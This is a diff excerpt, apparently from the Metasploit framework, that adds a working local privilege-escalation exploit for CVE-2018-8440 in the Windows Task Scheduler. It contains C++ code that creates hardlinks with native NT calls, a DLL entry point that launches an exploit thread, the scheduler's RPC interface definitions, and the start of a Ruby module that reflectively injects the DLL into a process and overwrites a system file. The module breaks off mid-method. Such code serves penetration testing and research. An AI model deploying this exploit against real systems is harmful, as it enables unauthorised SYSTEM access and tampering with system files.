||||
{
|
||||
return GetProcAddress(GetModuleHandleW(L"ntdll"), lpName);
|
||||
}
|
||||
|
||||
HANDLE OpenFileNative(LPCWSTR path, HANDLE root, ACCESS_MASK desired_access, ULONG share_access, ULONG open_options)
|
||||
{
|
||||
UNICODE_STRING name = { 0 };
|
||||
OBJECT_ATTRIBUTES obj_attr = { 0 };
|
||||
|
||||
DEFINE_NTDLL(RtlInitUnicodeString);
|
||||
DEFINE_NTDLL(NtOpenFile);
|
||||
|
||||
if (path)
|
||||
{
|
||||
fRtlInitUnicodeString(&name, path);
|
||||
InitializeObjectAttributes(&obj_attr, &name, OBJ_CASE_INSENSITIVE, root, nullptr);
|
||||
}
|
||||
else
|
||||
{
|
||||
InitializeObjectAttributes(&obj_attr, nullptr, OBJ_CASE_INSENSITIVE, root, nullptr);
|
||||
}
|
||||
|
||||
HANDLE h = nullptr;
|
||||
IO_STATUS_BLOCK io_status = { 0 };
|
||||
NTSTATUS status = fNtOpenFile(&h, desired_access, &obj_attr, &io_status, share_access, open_options);
|
||||
if (NT_SUCCESS(status))
|
||||
{
|
||||
return h;
|
||||
}
|
||||
else
|
||||
{
|
||||
return nullptr;
|
||||
}
|
||||
}
|
||||
|
||||
bool CreateNativeHardlink(LPCWSTR linkname, LPCWSTR targetname)
|
||||
{
|
||||
std::wstring full_linkname = BuildFullPath(linkname, true);
|
||||
size_t len = full_linkname.size() * sizeof(WCHAR);
|
||||
|
||||
typed_buffer_ptr<FILE_LINK_INFORMATION> link_info(sizeof(FILE_LINK_INFORMATION) + len - sizeof(WCHAR));
|
||||
|
||||
memcpy(&link_info->FileName[0], full_linkname.c_str(), len);
|
||||
link_info->ReplaceIfExists = TRUE;
|
||||
link_info->FileNameLength = len;
|
||||
|
||||
std::wstring full_targetname = BuildFullPath(targetname, true);
|
||||
|
||||
HANDLE hFile = OpenFileNative(full_targetname.c_str(), nullptr, MAXIMUM_ALLOWED, FILE_SHARE_READ, 0);
|
||||
if (hFile)
|
||||
{
|
||||
DEFINE_NTDLL(ZwSetInformationFile);
|
||||
IO_STATUS_BLOCK io_status = { 0 };
|
||||
|
||||
NTSTATUS status = fZwSetInformationFile(hFile, &io_status, link_info, link_info.size(), FileLinkInformation);
|
||||
CloseHandle(hFile);
|
||||
if (NT_SUCCESS(status))
|
||||
{
|
||||
return true;
|
||||
}
|
||||
}
|
||||
|
||||
return false;
|
||||
}
|
23
external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/dllmain.cpp
vendored
Executable file
23
external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/dllmain.cpp
vendored
Executable file
|
@ -0,0 +1,23 @@
|
|||
// dllmain.cpp : Defines the entry point for the DLL application.
|
||||
#include "stdafx.h"
|
||||
|
||||
DWORD CALLBACK ExploitThread(LPVOID hModule);
|
||||
|
||||
BOOL APIENTRY DllMain(HMODULE hModule,
|
||||
DWORD ul_reason_for_call,
|
||||
LPVOID lpReserved
|
||||
)
|
||||
{
|
||||
switch (ul_reason_for_call)
|
||||
{
|
||||
case DLL_PROCESS_ATTACH:
|
||||
CreateThread(NULL, 0, ExploitThread, lpReserved, 0, NULL);
|
||||
break;
|
||||
case DLL_THREAD_ATTACH:
|
||||
case DLL_THREAD_DETACH:
|
||||
case DLL_PROCESS_DETACH:
|
||||
break;
|
||||
}
|
||||
return TRUE;
|
||||
}
|
||||
|
51
external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/ntimports.h
vendored
Executable file
51
external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/ntimports.h
vendored
Executable file
|
@ -0,0 +1,51 @@
|
|||
#pragma once
|
||||
|
||||
#include <Windows.h>
|
||||
#include <winternl.h>
|
||||
|
||||
#define DIRECTORY_QUERY 0x0001
|
||||
#define DIRECTORY_TRAVERSE 0x0002
|
||||
#define DIRECTORY_CREATE_OBJECT 0x0004
|
||||
#define DIRECTORY_CREATE_SUBDIRECTORY 0x0008
|
||||
#define DIRECTORY_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | 0xF)
|
||||
|
||||
typedef NTSTATUS(NTAPI *_NtCreateDirectoryObject)(PHANDLE Handle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes);
|
||||
typedef NTSTATUS(NTAPI *_NtCreateDirectoryObjectEx)(PHANDLE Handle, ACCESS_MASK DesiredAccess,
|
||||
POBJECT_ATTRIBUTES ObjectAttributes, HANDLE ShadowDir, BOOLEAN Something);
|
||||
typedef NTSTATUS(NTAPI *_NtOpenDirectoryObject)(PHANDLE Handle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes);
|
||||
typedef VOID(NTAPI *_RtlInitUnicodeString)(PUNICODE_STRING DestinationString, PCWSTR SourceString);
|
||||
|
||||
#define SYMBOLIC_LINK_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | 0x1)
|
||||
|
||||
typedef NTSTATUS(NTAPI* _NtCreateSymbolicLinkObject)(PHANDLE LinkHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PUNICODE_STRING TargetName);
|
||||
typedef NTSTATUS(NTAPI* _NtOpenSymbolicLinkObject)(PHANDLE LinkHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes);
|
||||
typedef NTSTATUS(NTAPI* _NtQuerySymbolicLinkObject)(HANDLE LinkHandle, PUNICODE_STRING LinkTarget, PULONG ReturnedLength);
|
||||
typedef NTSTATUS(NTAPI* _NtOpenFile)(
|
||||
_Out_ PHANDLE FileHandle,
|
||||
_In_ ACCESS_MASK DesiredAccess,
|
||||
_In_ POBJECT_ATTRIBUTES ObjectAttributes,
|
||||
_Out_ PIO_STATUS_BLOCK IoStatusBlock,
|
||||
_In_ ULONG ShareAccess,
|
||||
_In_ ULONG OpenOptions
|
||||
);
|
||||
|
||||
const ULONG FileLinkInformation = 11;
|
||||
|
||||
typedef struct _FILE_LINK_INFORMATION {
|
||||
BOOLEAN ReplaceIfExists;
|
||||
HANDLE RootDirectory;
|
||||
ULONG FileNameLength;
|
||||
WCHAR FileName[1];
|
||||
} FILE_LINK_INFORMATION, *PFILE_LINK_INFORMATION;
|
||||
|
||||
typedef NTSTATUS(__stdcall *_ZwSetInformationFile)(
|
||||
_In_ HANDLE FileHandle,
|
||||
_Out_ PIO_STATUS_BLOCK IoStatusBlock,
|
||||
_In_ PVOID FileInformation,
|
||||
_In_ ULONG Length,
|
||||
_In_ ULONG FileInformationClass
|
||||
);
|
||||
typedef ULONG(NTAPI* _RtlNtStatusToDosError)(NTSTATUS status);
|
||||
void SetNtLastError(NTSTATUS status);
|
||||
|
||||
#define DEFINE_NTDLL(x) _ ## x f ## x = (_ ## x)GetProcAddressNT(#x)
|
|
@ -0,0 +1,166 @@
|
|||
import "oaidl.idl";
|
||||
import "ocidl.idl";
|
||||
|
||||
[
|
||||
uuid(86d35949-83c9-4044-b424-db363231fd0c),
|
||||
version(1.0),
|
||||
]
|
||||
interface DefaultIfName
|
||||
{
|
||||
|
||||
typedef struct Struct_18_t
|
||||
{
|
||||
[unique][string] wchar_t* StructMember0;
|
||||
[unique][string] wchar_t* StructMember1;
|
||||
long StructMember2;
|
||||
}Struct_18_t;
|
||||
|
||||
typedef struct Struct_74_t
|
||||
{
|
||||
long StructMember0;
|
||||
long StructMember1;
|
||||
[unique][string] wchar_t* StructMember2;
|
||||
[unique][string] wchar_t* StructMember3;
|
||||
}Struct_74_t;
|
||||
|
||||
typedef struct Struct_144_t
|
||||
{
|
||||
long StructMember0;
|
||||
short StructMember1;
|
||||
short StructMember2;
|
||||
byte StructMember3[8];
|
||||
}Struct_144_t;
|
||||
|
||||
typedef struct Struct_246_t
|
||||
{
|
||||
short StructMember0;
|
||||
short StructMember1;
|
||||
short StructMember2;
|
||||
short StructMember3;
|
||||
short StructMember4;
|
||||
short StructMember5;
|
||||
short StructMember6;
|
||||
short StructMember7;
|
||||
}Struct_246_t;
|
||||
|
||||
long _SchRpcHighestVersion(
|
||||
[out]long *arg_1);
|
||||
|
||||
long _SchRpcRegisterTask(
|
||||
[in][unique][string] wchar_t* arg_1,
|
||||
[in][string] wchar_t* arg_2,
|
||||
[in]long arg_3,
|
||||
[in][unique][string] wchar_t* arg_4,
|
||||
[in]long arg_5,
|
||||
[in]long arg_6,
|
||||
[in][unique] /* [DBG] FC_BOGUS_ARRAY */[size_is(arg_6)] /* */ struct Struct_18_t* arg_7,
|
||||
[out][ref][string] wchar_t** arg_8,
|
||||
[out][ref]struct Struct_74_t** arg_9);
|
||||
|
||||
long SchRpcRetrieveTask(
|
||||
[in][string] wchar_t* arg_1,
|
||||
[in][string] wchar_t* arg_2,
|
||||
[in]long *arg_3,
|
||||
[out][ref][string] wchar_t** arg_4);
|
||||
|
||||
long _SchRpcCreateFolder(
|
||||
[in][string] wchar_t* arg_1,
|
||||
[in][unique][string] wchar_t* arg_2,
|
||||
[in]long arg_3);
|
||||
|
||||
long _SchRpcSetSecurity(
|
||||
[in][string] wchar_t* arg_1,
|
||||
[in][string] wchar_t* arg_2,
|
||||
[in]long arg_3);
|
||||
|
||||
long _SchRpcGetSecurity(
|
||||
[in][string] wchar_t* arg_1,
|
||||
[in]long arg_2,
|
||||
[out][ref][string] wchar_t** arg_3);
|
||||
|
||||
long _SchRpcEnumFolders(
|
||||
[in][string] wchar_t* arg_1,
|
||||
[in]long arg_2,
|
||||
[in][out]long *arg_3,
|
||||
[in]long arg_4,
|
||||
[out]long *arg_5,
|
||||
[out][ref] /* [DBG] FC_BOGUS_ARRAY */[size_is(, *arg_5)] /* */[string] wchar_t*** arg_6);
|
||||
|
||||
long _SchRpcEnumTasks(
|
||||
[in][string] wchar_t* arg_1,
|
||||
[in]long arg_2,
|
||||
[in][out]long *arg_3,
|
||||
[in]long arg_4,
|
||||
[out]long *arg_5,
|
||||
[out][ref] /* [DBG] FC_BOGUS_ARRAY */[size_is(, *arg_5)] /* */[string] wchar_t*** arg_6);
|
||||
|
||||
long _SchRpcEnumInstances(
|
||||
[in][unique][string] wchar_t* arg_1,
|
||||
[in]long arg_2,
|
||||
[out]long *arg_3,
|
||||
[out][ref] /* [DBG] FC_BOGUS_ARRAY */[size_is(, *arg_3)] /* */ struct Struct_144_t** arg_4);
|
||||
|
||||
long _SchRpcGetInstanceInfo(
|
||||
[in]struct Struct_144_t* arg_1,
|
||||
[out][ref][string] wchar_t** arg_2,
|
||||
[out]long *arg_3,
|
||||
[out][ref][string] wchar_t** arg_4,
|
||||
[out][ref][string] wchar_t** arg_5,
|
||||
[out]long *arg_6,
|
||||
[out][ref] /* [DBG] FC_BOGUS_ARRAY */[size_is(, *arg_6)] /* */ struct Struct_144_t** arg_7,
|
||||
[out]long *arg_8);
|
||||
|
||||
long _SchRpcStopInstance(
|
||||
[in]struct Struct_144_t* arg_1,
|
||||
[in]long arg_2);
|
||||
|
||||
long _SchRpcStop(
|
||||
[in][unique][string] wchar_t* arg_1,
|
||||
[in]long arg_2);
|
||||
|
||||
long _SchRpcRun(
|
||||
[in][string] wchar_t* arg_1,
|
||||
[in]long arg_2,
|
||||
[in][unique] /* [DBG] FC_BOGUS_ARRAY */[size_is(arg_2)] /* */[string] wchar_t** arg_3,
|
||||
[in]long arg_4,
|
||||
[in]long arg_5,
|
||||
[in][unique][string] wchar_t* arg_6,
|
||||
[out]struct Struct_144_t* arg_7);
|
||||
|
||||
long _SchRpcDelete(
|
||||
[in][string] wchar_t* arg_1,
|
||||
[in]long arg_2);
|
||||
|
||||
long _SchRpcRename(
|
||||
[in][string] wchar_t* arg_1,
|
||||
[in][string] wchar_t* arg_2,
|
||||
[in]long arg_3);
|
||||
|
||||
long _SchRpcScheduledRuntimes(
|
||||
[in][string] wchar_t* arg_1,
|
||||
[in][unique]struct Struct_246_t* arg_2,
|
||||
[in][unique]struct Struct_246_t* arg_3,
|
||||
[in]long arg_4,
|
||||
[in]long arg_5,
|
||||
[out]long *arg_6,
|
||||
[out][ref] /* [DBG] FC_BOGUS_ARRAY */[size_is(, *arg_6)] /* */ struct Struct_246_t** arg_7);
|
||||
|
||||
long _SchRpcGetLastRunInfo(
|
||||
[in][string] wchar_t* arg_1,
|
||||
[out]struct Struct_246_t* arg_2,
|
||||
[out]long *arg_3);
|
||||
|
||||
long _SchRpcGetTaskInfo(
|
||||
[in][string] wchar_t* arg_1,
|
||||
[in]long arg_2,
|
||||
[out]long *arg_3,
|
||||
[out]long *arg_4);
|
||||
|
||||
long _SchRpcGetNumberOfMissedRuns(
|
||||
[in][string] wchar_t* arg_1,
|
||||
[out]long *arg_2);
|
||||
|
||||
long _SchRpcEnableTask(
|
||||
[in][string] wchar_t* arg_1,
|
||||
[in]long arg_2);
|
||||
}
|
File diff suppressed because it is too large
Load Diff
|
@ -0,0 +1,251 @@
|
|||
|
||||
|
||||
/* this ALWAYS GENERATED file contains the definitions for the interfaces */
|
||||
|
||||
|
||||
/* File created by MIDL compiler version 8.00.0603 */
|
||||
/* at Wed Sep 19 20:58:45 2018
|
||||
*/
|
||||
/* Compiler settings for rpc.idl:
|
||||
Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.00.0603
|
||||
protocol : dce , ms_ext, c_ext, robust
|
||||
error checks: allocation ref bounds_check enum stub_data
|
||||
VC __declspec() decoration level:
|
||||
__declspec(uuid()), __declspec(selectany), __declspec(novtable)
|
||||
DECLSPEC_UUID(), MIDL_INTERFACE()
|
||||
*/
|
||||
/* @@MIDL_FILE_HEADING( ) */
|
||||
|
||||
#pragma warning( disable: 4049 ) /* more than 64k source lines */
|
||||
|
||||
|
||||
/* verify that the <rpcndr.h> version is high enough to compile this file*/
|
||||
#ifndef __REQUIRED_RPCNDR_H_VERSION__
|
||||
#define __REQUIRED_RPCNDR_H_VERSION__ 475
|
||||
#endif
|
||||
|
||||
#include "rpc.h"
|
||||
#include "rpcndr.h"
|
||||
|
||||
#ifndef __RPCNDR_H_VERSION__
|
||||
#error this stub requires an updated version of <rpcndr.h>
|
||||
#endif // __RPCNDR_H_VERSION__
|
||||
|
||||
|
||||
#ifndef __rpc_h_h__
|
||||
#define __rpc_h_h__
|
||||
|
||||
#if defined(_MSC_VER) && (_MSC_VER >= 1020)
|
||||
#pragma once
|
||||
#endif
|
||||
|
||||
/* Forward Declarations */
|
||||
|
||||
/* header files for imported files */
|
||||
#include "oaidl.h"
|
||||
#include "ocidl.h"
|
||||
|
||||
#ifdef __cplusplus
|
||||
extern "C"{
|
||||
#endif
|
||||
|
||||
|
||||
#ifndef __DefaultIfName_INTERFACE_DEFINED__
|
||||
#define __DefaultIfName_INTERFACE_DEFINED__
|
||||
|
||||
/* interface DefaultIfName */
|
||||
/* [version][uuid] */
|
||||
|
||||
typedef struct Struct_18_t
|
||||
{
|
||||
/* [string][unique] */ wchar_t *StructMember0;
|
||||
/* [string][unique] */ wchar_t *StructMember1;
|
||||
long StructMember2;
|
||||
} Struct_18_t;
|
||||
|
||||
typedef struct Struct_74_t
|
||||
{
|
||||
long StructMember0;
|
||||
long StructMember1;
|
||||
/* [string][unique] */ wchar_t *StructMember2;
|
||||
/* [string][unique] */ wchar_t *StructMember3;
|
||||
} Struct_74_t;
|
||||
|
||||
typedef struct Struct_144_t
|
||||
{
|
||||
long StructMember0;
|
||||
short StructMember1;
|
||||
short StructMember2;
|
||||
byte StructMember3[ 8 ];
|
||||
} Struct_144_t;
|
||||
|
||||
typedef struct Struct_246_t
|
||||
{
|
||||
short StructMember0;
|
||||
short StructMember1;
|
||||
short StructMember2;
|
||||
short StructMember3;
|
||||
short StructMember4;
|
||||
short StructMember5;
|
||||
short StructMember6;
|
||||
short StructMember7;
|
||||
} Struct_246_t;
|
||||
|
||||
long _SchRpcHighestVersion(
|
||||
/* [in] */ handle_t IDL_handle,
|
||||
/* [out] */ long *arg_1);
|
||||
|
||||
long _SchRpcRegisterTask(
|
||||
/* [in] */ handle_t IDL_handle,
|
||||
/* [string][unique][in] */ wchar_t *arg_1,
|
||||
/* [string][in] */ wchar_t *arg_2,
|
||||
/* [in] */ long arg_3,
|
||||
/* [string][unique][in] */ wchar_t *arg_4,
|
||||
/* [in] */ long arg_5,
|
||||
/* [in] */ long arg_6,
|
||||
/* [size_is][unique][in] */ struct Struct_18_t *arg_7,
|
||||
/* [string][ref][out] */ wchar_t **arg_8,
|
||||
/* [ref][out] */ struct Struct_74_t **arg_9);
|
||||
|
||||
long SchRpcRetrieveTask(
|
||||
/* [in] */ handle_t IDL_handle,
|
||||
/* [string][in] */ wchar_t *arg_1,
|
||||
/* [string][in] */ wchar_t *arg_2,
|
||||
/* [in] */ long *arg_3,
|
||||
/* [string][ref][out] */ wchar_t **arg_4);
|
||||
|
||||
long _SchRpcCreateFolder(
|
||||
/* [in] */ handle_t IDL_handle,
|
||||
/* [string][in] */ wchar_t *arg_1,
|
||||
/* [string][unique][in] */ wchar_t *arg_2,
|
||||
/* [in] */ long arg_3);
|
||||
|
||||
long _SchRpcSetSecurity(
|
||||
/* [in] */ handle_t IDL_handle,
|
||||
/* [string][in] */ wchar_t *arg_1,
|
||||
/* [string][in] */ wchar_t *arg_2,
|
||||
/* [in] */ long arg_3);
|
||||
|
||||
long _SchRpcGetSecurity(
|
||||
/* [in] */ handle_t IDL_handle,
|
||||
/* [string][in] */ wchar_t *arg_1,
|
||||
/* [in] */ long arg_2,
|
||||
/* [string][ref][out] */ wchar_t **arg_3);
|
||||
|
||||
long _SchRpcEnumFolders(
|
||||
/* [in] */ handle_t IDL_handle,
|
||||
/* [string][in] */ wchar_t *arg_1,
|
||||
/* [in] */ long arg_2,
|
||||
/* [out][in] */ long *arg_3,
|
||||
/* [in] */ long arg_4,
|
||||
/* [out] */ long *arg_5,
|
||||
/* [string][size_is][size_is][ref][out] */ wchar_t ***arg_6);
|
||||
|
||||
long _SchRpcEnumTasks(
|
||||
/* [in] */ handle_t IDL_handle,
|
||||
/* [string][in] */ wchar_t *arg_1,
|
||||
/* [in] */ long arg_2,
|
||||
/* [out][in] */ long *arg_3,
|
||||
/* [in] */ long arg_4,
|
||||
/* [out] */ long *arg_5,
|
||||
/* [string][size_is][size_is][ref][out] */ wchar_t ***arg_6);
|
||||
|
||||
long _SchRpcEnumInstances(
|
||||
/* [in] */ handle_t IDL_handle,
|
||||
/* [string][unique][in] */ wchar_t *arg_1,
|
||||
/* [in] */ long arg_2,
|
||||
/* [out] */ long *arg_3,
|
||||
/* [size_is][size_is][ref][out] */ struct Struct_144_t **arg_4);
|
||||
|
||||
long _SchRpcGetInstanceInfo(
|
||||
/* [in] */ handle_t IDL_handle,
|
||||
/* [in] */ struct Struct_144_t *arg_1,
|
||||
/* [string][ref][out] */ wchar_t **arg_2,
|
||||
/* [out] */ long *arg_3,
|
||||
/* [string][ref][out] */ wchar_t **arg_4,
|
||||
/* [string][ref][out] */ wchar_t **arg_5,
|
||||
/* [out] */ long *arg_6,
|
||||
/* [size_is][size_is][ref][out] */ struct Struct_144_t **arg_7,
|
||||
/* [out] */ long *arg_8);
|
||||
|
||||
long _SchRpcStopInstance(
|
||||
/* [in] */ handle_t IDL_handle,
|
||||
/* [in] */ struct Struct_144_t *arg_1,
|
||||
/* [in] */ long arg_2);
|
||||
|
||||
long _SchRpcStop(
|
||||
/* [in] */ handle_t IDL_handle,
|
||||
/* [string][unique][in] */ wchar_t *arg_1,
|
||||
/* [in] */ long arg_2);
|
||||
|
||||
long _SchRpcRun(
|
||||
/* [in] */ handle_t IDL_handle,
|
||||
/* [string][in] */ wchar_t *arg_1,
|
||||
/* [in] */ long arg_2,
|
||||
/* [string][size_is][unique][in] */ wchar_t **arg_3,
|
||||
/* [in] */ long arg_4,
|
||||
/* [in] */ long arg_5,
|
||||
/* [string][unique][in] */ wchar_t *arg_6,
|
||||
/* [out] */ struct Struct_144_t *arg_7);
|
||||
|
||||
long _SchRpcDelete(
|
||||
/* [in] */ handle_t IDL_handle,
|
||||
/* [string][in] */ wchar_t *arg_1,
|
||||
/* [in] */ long arg_2);
|
||||
|
||||
long _SchRpcRename(
|
||||
/* [in] */ handle_t IDL_handle,
|
||||
/* [string][in] */ wchar_t *arg_1,
|
||||
/* [string][in] */ wchar_t *arg_2,
|
||||
/* [in] */ long arg_3);
|
||||
|
||||
long _SchRpcScheduledRuntimes(
|
||||
/* [in] */ handle_t IDL_handle,
|
||||
/* [string][in] */ wchar_t *arg_1,
|
||||
/* [unique][in] */ struct Struct_246_t *arg_2,
|
||||
/* [unique][in] */ struct Struct_246_t *arg_3,
|
||||
/* [in] */ long arg_4,
|
||||
/* [in] */ long arg_5,
|
||||
/* [out] */ long *arg_6,
|
||||
/* [size_is][size_is][ref][out] */ struct Struct_246_t **arg_7);
|
||||
|
||||
long _SchRpcGetLastRunInfo(
|
||||
/* [in] */ handle_t IDL_handle,
|
||||
/* [string][in] */ wchar_t *arg_1,
|
||||
/* [out] */ struct Struct_246_t *arg_2,
|
||||
/* [out] */ long *arg_3);
|
||||
|
||||
long _SchRpcGetTaskInfo(
|
||||
/* [in] */ handle_t IDL_handle,
|
||||
/* [string][in] */ wchar_t *arg_1,
|
||||
/* [in] */ long arg_2,
|
||||
/* [out] */ long *arg_3,
|
||||
/* [out] */ long *arg_4);
|
||||
|
||||
long _SchRpcGetNumberOfMissedRuns(
|
||||
/* [in] */ handle_t IDL_handle,
|
||||
/* [string][in] */ wchar_t *arg_1,
|
||||
/* [out] */ long *arg_2);
|
||||
|
||||
long _SchRpcEnableTask(
|
||||
/* [in] */ handle_t IDL_handle,
|
||||
/* [string][in] */ wchar_t *arg_1,
|
||||
/* [in] */ long arg_2);
|
||||
|
||||
|
||||
|
||||
extern RPC_IF_HANDLE DefaultIfName_v1_0_c_ifspec;
|
||||
extern RPC_IF_HANDLE DefaultIfName_v1_0_s_ifspec;
|
||||
#endif /* __DefaultIfName_INTERFACE_DEFINED__ */
|
||||
|
||||
/* Additional Prototypes for ALL interfaces */
|
||||
|
||||
/* end of Additional Prototypes */
|
||||
|
||||
#ifdef __cplusplus
|
||||
}
|
||||
#endif
|
||||
|
||||
#endif
|
||||
|
||||
|
File diff suppressed because it is too large
Load Diff
|
@ -0,0 +1,8 @@
|
|||
// stdafx.cpp : source file that includes just the standard includes
|
||||
// $safeprojectname$.pch will be the pre-compiled header
|
||||
// stdafx.obj will contain the pre-compiled type information
|
||||
|
||||
#include "stdafx.h"
|
||||
|
||||
// TODO: reference any additional headers you need in STDAFX.H
|
||||
// and not in this file
|
|
@ -0,0 +1,15 @@
|
|||
// stdafx.h : include file for standard system include files,
|
||||
// or project specific include files that are used frequently, but
|
||||
// are changed infrequently
|
||||
//
|
||||
|
||||
#pragma once
|
||||
|
||||
|
||||
|
||||
#define RPC_USE_NATIVE_WCHAR
|
||||
|
||||
#include <stdio.h>
|
||||
#include <tchar.h>
|
||||
#include <Windows.h>
|
||||
#include <memory>
|
70
external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/typed_buffer.h
vendored
Executable file
70
external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/typed_buffer.h
vendored
Executable file
|
@ -0,0 +1,70 @@
|
|||
#pragma once
|
||||
|
||||
#include <memory>
|
||||
#include <algorithm>
|
||||
|
||||
template<class T>
|
||||
class typed_buffer_ptr {
|
||||
std::unique_ptr<char[]> buffer_;
|
||||
size_t size_;
|
||||
|
||||
public:
|
||||
typed_buffer_ptr() {
|
||||
}
|
||||
|
||||
explicit typed_buffer_ptr(size_t size) {
|
||||
reset(size);
|
||||
}
|
||||
|
||||
void reset(size_t size) {
|
||||
buffer_.reset(new char[size]);
|
||||
memset(buffer_.get(), 0, size);
|
||||
size_ = size;
|
||||
}
|
||||
|
||||
void resize(size_t size) {
|
||||
std::unique_ptr<char[]> tmp(new char[size]);
|
||||
|
||||
memcpy(tmp.get(), buffer_.get(), min(size, size_));
|
||||
|
||||
buffer_ = std::move(tmp);
|
||||
}
|
||||
|
||||
operator T*() {
|
||||
return reinterpret_cast<T*>(buffer_.get());
|
||||
}
|
||||
|
||||
operator const T*() const {
|
||||
return cget();
|
||||
}
|
||||
|
||||
T* operator->() const {
|
||||
return reinterpret_cast<T*>(buffer_.get());
|
||||
}
|
||||
|
||||
const T* cget() const {
|
||||
return interpret_cast<const T*>(buffer_.get());
|
||||
}
|
||||
|
||||
typed_buffer_ptr(const typed_buffer_ptr<T>& other) = delete;
|
||||
typed_buffer_ptr& typed_buffer_ptr::operator=(const typed_buffer_ptr<T>& other) = delete;
|
||||
|
||||
typed_buffer_ptr(typed_buffer_ptr<T>&& other) {
|
||||
buffer_ = std::move(other.buffer_);
|
||||
size_ = other.size_;
|
||||
other.size_ = 0;
|
||||
}
|
||||
|
||||
typed_buffer_ptr& operator=(typed_buffer_ptr<T>&& other) {
|
||||
if (this != &other)
|
||||
{
|
||||
buffer_ = std::move(other.buffer_);
|
||||
size_ = other.size_;
|
||||
other.size_ = 0;
|
||||
}
|
||||
}
|
||||
|
||||
size_t size() const {
|
||||
return size_;
|
||||
}
|
||||
};
|
|
@ -0,0 +1,142 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core/post/file'
|
||||
require 'msf/core/post/windows/priv'
|
||||
require 'msf/core/post/windows/registry' #TODO: Do we need this?
|
||||
require 'msf/core/exploit/exe'
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Local
|
||||
Rank = NormalRanking
|
||||
|
||||
include Msf::Post::File
|
||||
include Msf::Exploit::EXE
|
||||
include Msf::Post::Windows::Priv
|
||||
include Msf::Post::Windows::ReflectiveDLLInjection
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Microsoft Windows ALPC Task Scheduler Local Privilege Elevation',
|
||||
'Description' => %q(
|
||||
On vulnerable versions of Windows the alpc endpoint method SchRpcSetSecurity implemented
|
||||
by the task scheduler service can be used to write arbitrary DACLs to `.job` files located
|
||||
in `c:\windows\tasks` because the scheduler does not use impersonation when checking this
|
||||
location. Since users can create files in the `c:\windows\tasks` folder, a hardlink can be
|
||||
created to a file the user has read access to. After creating a hardlink, the vulnerability
|
||||
can be triggered to set the DACL on the linked file.
|
||||
|
||||
WARNING:
|
||||
The PrintConfig.dll (%windir%\system32\driverstor\filerepository\prnms003*) on the target host
|
||||
will be overwritten when the exploit runs.
|
||||
|
||||
This module has been tested against Windows 10 Pro x64.
|
||||
),
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'SandboxEscaper', # Original discovery and PoC
|
||||
'bwatters-r7', # msf module
|
||||
'asoto-r7', # msf module
|
||||
'Jacob Robles' # msf module
|
||||
],
|
||||
'Platform' => 'win',
|
||||
'SessionTypes' => ['meterpreter'],
|
||||
'Targets' =>
|
||||
[
|
||||
['Windows 10 x64', { 'Arch' => ARCH_X64 }]
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2018-8440'],
|
||||
['URL', 'https://github.com/SandboxEscaper/randomrepo/'],
|
||||
],
|
||||
'DisclosureDate' => 'Aug 27 2018',
|
||||
'DefaultTarget' => 0,
|
||||
))
|
||||
|
||||
register_options([OptString.new('PROCESS',
|
||||
[false, 'Name of process to spawn and inject dll into.', nil])
|
||||
])
|
||||
end
|
||||
|
||||
def setup_process(process_name)
|
||||
begin
|
||||
print_status("Launching #{process_name} to host the exploit...")
|
||||
launch_process = client.sys.process.execute(process_name, nil, 'Hidden' => true)
|
||||
process = client.sys.process.open(launch_process.pid, PROCESS_ALL_ACCESS)
|
||||
print_good("Process #{process.pid} launched.")
|
||||
rescue Rex::Post::Meterpreter::RequestError
|
||||
# Sandboxes could not allow to create a new process
|
||||
# stdapi_sys_process_execute: Operation failed: Access is denied.
|
||||
print_error('Operation failed. Trying to elevate the current process...')
|
||||
process = client.sys.process.open
|
||||
end
|
||||
process
|
||||
end
|
||||
|
||||
def inject_magic(process, payload_dll)
|
||||
library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-8440', 'ALPC-TaskSched-LPE.dll')
|
||||
library_path = ::File.expand_path(library_path)
|
||||
dll_data = ''
|
||||
::File.open(library_path, 'rb') { |f| dll_data = f.read }
|
||||
|
||||
print_status("Writing payload dll into process #{process.pid} memory")
|
||||
payload_addr = process.memory.allocate(payload_dll.length, PROT_READ | PROT_WRITE)
|
||||
written = process.memory.write(payload_addr, payload_dll)
|
||||
|
||||
if written != payload_dll.length
|
||||
fail_with(Failure::UnexpectedReply, 'Failed to write payload to process memory')
|
||||
end
|
||||
|
||||
print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
|
||||
exploit_mem, offset = inject_dll_data_into_process(process, dll_data)
|
||||
process.thread.create(exploit_mem + offset, payload_addr)
|
||||
end
|
||||
|
||||
def validate_active_host
|
||||
sysinfo['Computer']
|
||||
true
|
||||
rescue Rex::Post::Meterpreter::RequestError, Rex::TimeoutError => e
|
||||
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
|
||||
false
|
||||
end
|
||||
|
||||
def validate_target
|
||||
if is_system?
|
||||
fail_with(Failure::None, 'Session is already elevated')
|
||||
end
|
||||
|
||||
if sysinfo['Architecture'] == ARCH_X86
|
||||
fail_with(Failure::NoTarget, 'Exploit code is 64-bit only')
|
||||
end
|
||||
|
||||
if sysinfo['OS'] =~ /XP/
|
||||
fail_with(Failure::Unknown, 'The exploit binary does not support Windows XP')
|
||||
end
|
||||
end
|
||||
|
||||
def exploit
|
||||
unless session.type == 'meterpreter'
|
||||
